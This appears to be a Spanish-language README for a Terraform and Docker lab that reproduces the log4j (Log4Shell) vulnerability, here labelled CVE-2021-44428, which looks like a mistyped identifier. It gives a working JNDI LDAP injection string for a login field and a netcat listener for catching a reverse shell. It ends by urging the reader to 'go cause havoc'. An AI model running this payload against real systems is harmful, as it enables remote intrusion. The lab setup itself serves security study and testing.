
Terraform y recursos de Docker para levantar rápidamente una prueba de CVE-2021-44428
Este repositorio está configurado para probar rápidamente la vulnerabilidad log4j usando Docker y Hashicorp Terraform. Todos los componentes de esta prueba se ejecutarán en contenedores Docker dentro de la red Docker, accesibles a través de 'host.docker.internal'.
Este entorno de prueba se deriva de una excelente publicación de blog de Raxis: (https://raxis.com/blog/log4j-exploit)
La aplicación vulnerable y el código del exploit provienen de cyberxml (https://github.com/cyberxml/log4j-poc).
Todo lo que he hecho es codificar el entorno para que sea fácil de poner en marcha y probar este delicioso exploit.
No asumo ninguna responsabilidad por efectos adversos o acciones maliciosas que puedan resultar del uso del material en este repositorio. Punto final. Depende de ti decidir si estos materiales son confiables y es igualmente tu responsabilidad usar esta información de manera ética. Simplemente publico estas joyas para que investigadores, estudiantes y profesionales de seguridad puedan crear rápidamente un entorno y probar el exploit por sí mismos. Seacrest out.
Accede al contenedor log4j_netcat usando 'docker exec -it netcat /bin/bash' o algo similar. Aquí es donde recibirás tu conexión de shell al servidor víctima una vez que se establezca.
En tu sesión dentro del contenedor log4j_netcat, ingresa el siguiente comando para iniciar el listener:
nc -lv -s 0.0.0.0 -p 9001
En tu navegador, navega a http://host.docker.internal:8080/log4shell/
Ingresa lo siguiente en el campo 'Username' junto con lo que quieras en el campo 'Password':
${jndi:ldap://host.docker.internal:1389/a}
Regresa al shell del contenedor log4j_netcat y observa que te has conectado al servidor víctima.
¡Ve y causa estragos!